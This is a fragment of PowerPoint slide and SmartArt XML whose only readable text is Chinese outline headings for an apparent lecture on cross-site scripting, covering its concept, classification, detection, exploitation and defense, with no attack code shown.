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02" r:id="rId3"/>
    <p:sldId id="303" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="337" r:id="rId7"/>
    <p:sldId id="338" r:id="rId8"/>
    <p:sldId id="339" r:id="rId9"/>
    <p:sldId id="340" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="341" r:id="rId12"/>
    <p:sldId id="342" r:id="rId13"/>
    <p:sldId id="344" r:id="rId14"/>
    <p:sldId id="345" r:id="rId15"/>
    <p:sldId id="346" r:id="rId16"/>
    <p:sldId id="347" r:id="rId17"/>
    <p:sldId id="352" r:id="rId18"/>
    <p:sldId id="353" r:id="rId19"/>
    <p:sldId id="351" r:id="rId20"/>
    <p:sldId id="354" r:id="rId21"/>
    <p:sldId id="349" r:id="rId22"/>
    <p:sldId id="355" r:id="rId23"/>
    <p:sldId id="357" r:id="rId24"/>
    <p:sldId id="356" r:id="rId25"/>
    <p:sldId id="358" r:id="rId26"/>
    <p:sldId id="360" r:id="rId27"/>
    <p:sldId id="362" r:id="rId28"/>
    <p:sldId id="359" r:id="rId29"/>
    <p:sldId id="361" r:id="rId30"/>
    <p:sldId id="363" r:id="rId31"/>
    <p:sldId id="273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628" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1"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C8278-D12D-4823-A466-1DC79C55EB4D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5411884D-980D-4B2E-A82A-7DD4695FEA20}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN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跨站脚本概念</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30065234-9712-443F-9279-C348D61F9FA5}" type="par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43A0069C-C86E-409B-B975-653B85FA5463}" type="sib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9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN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跨站脚本分类</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FE62B66-E7A0-4F48-9981-10BC8AFCA747}" type="par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4D0CC405-57D2-4953-871A-D28692A6A776}" type="sib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1CC7F25C-E490-4709-863B-EBB02ADEEFEC}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US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检测</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN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</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022349D0-4991-41C1-B687-D191CEB40F71}" type="parTrans" cxnId="{CD7DBB4A-E3DA-4E94-90F5-DF65F4953459}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{720F1C68-5572-4E5A-9671-28590011ACC9}" type="sibTrans" cxnId="{CD7DBB4A-E3DA-4E94-90F5-DF65F4953459}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US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漏洞防御</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5460A05-E7C4-4FA1-B776-5683BCAF3965}" type="parTrans" cxnId="{48CB86CB-3337-43DA-91AB-990B547BCE9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93C65928-A019-48BB-B650-FB64FF08ACD1}" type="sibTrans" cxnId="{48CB86CB-3337-43DA-91AB-990B547BCE9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33202D5D-1503-4059-903E-0B9D81CA561B}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US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漏洞利用</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0DDB610-ACAE-4C25-97E1-90A2E828D93A}" type="parTrans" cxnId="{CB146C7E-C8C5-4425-82F6-E4FA3205E680}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D5B929-3A13-445F-A3BB-77E81A59B4F8}" type="sibTrans" cxnId="{CB146C7E-C8C5-4425-82F6-E4FA3205E680}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022C0433-942F-4932-95D7-C7F59F0E311A}" type="pres">
      <dgm:prSet presAssocID="{F31C8278-D12D-4823-A466-1DC79C55EB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DA0F87-1535-40AB-9278-9739A55E7069}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20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B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA2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BF722-37F6-4977-A1D9-FA7F23B8BDE5}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9CA8BEC-2A1F-4043-A946-228EC802D4C8}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC2E4A44-EC5F-4CC2-9293-24CAA7E9B740}" type="pres">
      <dgm:prSet presAssocID="{43A0069C-C86E-409B-B975-653B85FA5463}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{034A669D-A45E-465A-8320-A4264CABDFDE}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9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2494911-9929-4822-BA12-3607699E0790}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D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DB06C-1AB0-459C-938C-6AD6B9A99E94}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{939AB88B-0E0F-4E2E-B417-5883B00B47E3}" type="pres">
      <dgm:prSet presAssocID="{4D0CC405-57D2-4953-871A-D28692A6A776}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3B68775-3309-4E73-8CD6-B51CBBFA57A5}" type="pres">
      <dgm:prSet presAssocID="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D4DF2F7-29C3-47C6-A0AC-B3520AC2FB90}" type="pres">
      <dgm:prSet presAssocID="{1CC7F25C-E490-4709-863B-EBB02ADEEFE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FC5B087B-7616-4962-96F8-53819DF29377}" type="pres">
      <dgm:prSet presAssocID="{1CC7F25C-E490-4709-863B-EBB02ADEEF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6590F3-CCDD-4039-ACB7-475BDD581C2F}" type="pres">
      <dgm:prSet presAssocID="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC497596-9AD3-4C8C-B9FB-1CF29FE6916C}" type="pres">
      <dgm:prSet presAssocID="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3CBF0BDF-C579-4CA3-9AAD-AC2C987EA5D6}" type="pres">
      <dgm:prSet presAssocID="{720F1C68-5572-4E5A-9671-28590011ACC9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{390EA162-9C74-4F86-97D2-35F733996C67}" type="pres">
      <dgm:prSet presAssocID="{33202D5D-1503-4059-903E-0B9D81CA561B}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{210B797D-6A52-4116-8827-1EA14A909D27}" type="pres">
      <dgm:prSet presAssocID="{33202D5D-1503-4059-903E-0B9D81CA561B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EA13E420-4A79-4227-9C5C-1BEDEDCB1BCD}" type="pres">
      <dgm:prSet presAssocID="{33202D5D-1503-4059-903E-0B9D81CA561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C50C5-AE05-4B08-B513-A31AF11D4B12}" type="pres">
      <dgm:prSet presAssocID="{33202D5D-1503-4059-903E-0B9D81CA561B}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0D9AF0C-2478-4531-9DAD-32F48486E9EC}" type="pres">
      <dgm:prSet presAssocID="{33202D5D-1503-4059-903E-0B9D81CA561B}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C34844E-94C4-4CE6-838A-E157292F4794}" type="pres">
      <dgm:prSet presAssocID="{13D5B929-3A13-445F-A3BB-77E81A59B4F8}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{937EB6A9-A2B8-453A-963D-A9C337E7B4B3}" type="pres">
      <dgm:prSet presAssocID="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C6E7425-765B-45D5-9A9C-3F4197FC7A04}" type="pres">
      <dgm:prSet presAssocID="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E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36D6B265-1E2A-4631-9435-3BD534B762B1}" type="pres">
      <dgm:prSet presAssocID="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36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AD903-285E-4F50-B841-D18A7DDA7A8F}" type="pres">
      <dgm:prSet presAssocID="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{802781DC-81BF-49F9-845C-85869DF18F01}" type="pres">
      <dgm:prSet presAssocID="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C3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FDFE129-7F26-4372-AA0A-48CC589D2D0E}" type="presOf" srcId="{33202D5D-1503-4059-903E-0B9D81CA561B}" destId="{210B797D-6A52-4116-8827-1EA14A909D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{03DC5DA0-B1F0-4DE8-BCEB-9869442C15CF}" type="presOf" srcId="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" destId="{4D4DF2F7-29C3-47C6-A0AC-B3520AC2FB90}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D6FC345B-E676-4EEA-B9B7-A009252F9635}" type="presOf" srcId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" destId="{8B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6ECAD7F5-F8D2-4460-988C-CC54C454DBAB}" type="presOf" srcId="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}" destId="{36D6B265-1E2A-4631-9435-3BD534B762B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4F4C9AA8-FDB6-47AF-8A5F-07D951D7C187}" type="presOf" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{022C0433-942F-4932-95D7-C7F59F0E311A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{54B1D4C9-818A-4E77-921B-367A90A658AC}" type="presOf" srcId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" destId="{034A669D-A45E-465A-8320-A4264CABDFDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{317FF0AF-7B1B-4617-99E9-58D48E570224}" type="presOf" srcId="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}" destId="{3C6E7425-765B-45D5-9A9C-3F4197FC7A04}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{48CB86CB-3337-43DA-91AB-990B547BCE9F}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{29F07A83-7C2B-4C6F-B8BB-A7F840A5C36E}" srcOrd="4" destOrd="0" parTransId="{C5460A05-E7C4-4FA1-B776-5683BCAF3965}" sibTransId="{93C65928-A019-48BB-B650-FB64FF08ACD1}"/>
    <dgm:cxn modelId="{E37FE351-D084-455D-AE05-A1B386D6B800}" type="presOf" srcId="{33202D5D-1503-4059-903E-0B9D81CA561B}" destId="{EA13E420-4A79-4227-9C5C-1BEDEDCB1BCD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CD7DBB4A-E3DA-4E94-90F5-DF65F4953459}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" srcOrd="2" destOrd="0" parTransId="{022349D0-4991-41C1-B687-D191CEB40F71}" sibTransId="{720F1C68-5572-4E5A-9671-28590011ACC9}"/>
    <dgm:cxn modelId="{40B73EA0-E42E-486A-8D65-ABE0C58D39F1}" type="presOf" srcId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" destId="{D2494911-9929-4822-BA12-3607699E0790}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FA536CE6-74F9-42AA-8B43-4725B60B79F6}" type="presOf" srcId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" destId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D199495E-2EB4-47DB-A901-BD69807325A3}" type="presOf" srcId="{1CC7F25C-E490-4709-863B-EBB02ADEEFEC}" destId="{FC5B087B-7616-4962-96F8-53819DF29377}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{174A9816-E955-4D90-AAE3-BF532E579053}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" srcOrd="1" destOrd="0" parTransId="{4FE62B66-E7A0-4F48-9981-10BC8AFCA747}" sibTransId="{4D0CC405-57D2-4953-871A-D28692A6A776}"/>
    <dgm:cxn modelId="{F4B685CB-61DC-4214-88F5-147B88ED113A}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" srcOrd="0" destOrd="0" parTransId="{30065234-9712-443F-9279-C348D61F9FA5}" sibTransId="{43A0069C-C86E-409B-B975-653B85FA5463}"/>
    <dgm:cxn modelId="{CB146C7E-C8C5-4425-82F6-E4FA3205E680}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{33202D5D-1503-4059-903E-0B9D81CA561B}" srcOrd="3" destOrd="0" parTransId="{F0DDB610-ACAE-4C25-97E1-90A2E828D93A}" sibTransId="{13D5B929-3A13-445F-A3BB-77E81A59B4F8}"/>
    <dgm:cxn modelId="{12565E2E-4D81-4EBA-BE76-5A3B93C28780}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C38AC3E0-42E4-4AAF-AE35-CC16A87D2EB9}" type="presParOf" srcId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" destId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC202C8E-A7C5-4A9C-BF80-9A3322F854BE}" type="presParOf" srcId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" destId="{8B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{85AB9F57-63C2-4FA6-BCFF-9080A0C86382}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{ECFBF722-37F6-4977-A1D9-FA7F23B8BDE5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F781CCDE-1C88-4A66-9FDC-576B61C93FAA}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{C9CA8BEC-2A1F-4043-A946-228EC802D4C8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{18268E62-E6B8-4418-BFD7-AFACCAC4C0C2}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{AC2E4A44-EC5F-4CC2-9293-24CAA7E9B740}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3DE099E1-86F6-49D2-A0D1-7187418C6312}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{731C773A-0C03-4DED-A152-C1FA1E04AB4A}" type="presParOf" srcId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" destId="{034A669D-A45E-465A-8320-A4264CABDFDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1EC59FBD-3270-466F-A554-B339A60EE74F}" type="presParOf" srcId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" destId="{D2494911-9929-4822-BA12-3607699E0790}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{15AB550C-7C86-41E8-ADC5-F67E93462599}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{764DB06C-1AB0-459C-938C-6AD6B9A99E94}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{41A41E33-BB5C-4351-80BC-F67C4EAA4B4B}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6F235914-8524-42A9-811D-D895F3F5AF64}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{939AB88B-0E0F-4E2E-B417-5883B00B47E3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{557A4967-145A-48F3-B256-DD609096E80D}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{F3B68775-3309-4E73-8CD6-B51CBBFA57A5}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A445CB02-230E-4099-AC2F-08E622156C7C}" type="presParOf" srcId="{F3B68775-3309-4E73-8CD6-B51CBBFA57A5}" destId="{4D4DF2F7-29C3-47C6-A0AC-B3520AC2FB90}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0D424AFF-004D-4A59-B8DB-0B37B55C429B}" type="presParOf" srcId="{F3B68775-3309-4E73-8CD6-B51CBBFA57A5}" destId="{FC5B087B-7616-4962-96F8-53819DF29377}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{26F78662-A172-4BAD-8DDA-794DD3DF91D1}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{556590F3-CCDD-4039-ACB7-475BDD581C2F}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{66B924A0-E94D-44A4-9244-F5151E78A1DB}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{EC497596-9AD3-4C8C-B9FB-1CF29FE6916C}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57351465-EC0A-4146-8335-8A41483971F3}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{3CBF0BDF-C579-4CA3-9AAD-AC2C987EA5D6}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4DC596C0-A904-40CD-A2E2-BEE0A189A63B}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{390EA162-9C74-4F86-97D2-35F733996C67}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8D06E818-9C47-443D-AB14-AFBA91CF2235}" type="presParOf" srcId="{390EA162-9C74-4F86-97D2-35F733996C67}" destId="{210B797D-6A52-4116-8827-1EA14A909D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F872E854-BFA3-4B2A-BD36-FD7E3926A3B7}" type="presParOf" srcId="{390EA162-9C74-4F86-97D2-35F733996C67}" destId="{EA13E420-4A79-4227-9C5C-1BEDEDCB1BCD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8386B21C-3503-4749-A2AD-3B0A0C1E245F}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{718C50C5-AE05-4B08-B513-A31AF11D4B12}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EABF3BA2-0429-409D-A29D-14634FC88858}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{D0D9AF0C-2478-4531-9DAD-32F48486E9EC}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{321179AE-B3BB-4F50-B50E-B4C5F5BEAD87}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{7C34844E-94C4-4CE6-838A-E157292F4794}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{04FEF6BF-4D93-4D76-A312-E257F96C896F}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{937EB6A9-A2B8-453A-963D-A9C337E7B4B3}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{27CA735F-DCDF-4FC2-B728-050706206BDE}" type="presParOf" srcId="{937EB6A9-A2B8-453A-963D-A9C337E7B4B3}" destId="{3C6E7425-765B-45D5-9A9C-3F4197FC7A04}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{828E6ACA-D992-4466-964E-99B61A84D836}" type="presParOf" srcId="{937EB6A9-A2B8-453A-963D-A9C337E7B4B3}" destId="{36D6B265-1E2A-4631-9435-3BD534B762B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1B81C1AD-F127-4F5E-AF4D-8FBC67F6D6DA}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{002AD903-285E-4F50-B841-D18A7DDA7A8F}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5E6C15A6-F0F3-4A76-9B7C-A02CF7185D4F}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{802781DC-81BF-49F9-845C-85869DF18F0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跨站脚本概念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跨站脚本分类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检测</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN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漏洞利用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漏洞防御</a:t>
          </a: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8BEC-2A1F-4043-A946-228EC802D4C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="41156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E51A9-54D5-404B-BA68-9AB0868B7BB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="72083"/>
          <a:ext cx="5745162" cy="6789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sz="23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跨站脚本概念</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="443512" y="105227"/>
        <a:ext cx="5678874" cy="612672"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="145484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76561"/>
              <a:satOff val="-1098"/>
              <a:lumOff val="6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4911-9929-4822-BA12-3607699E0790}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
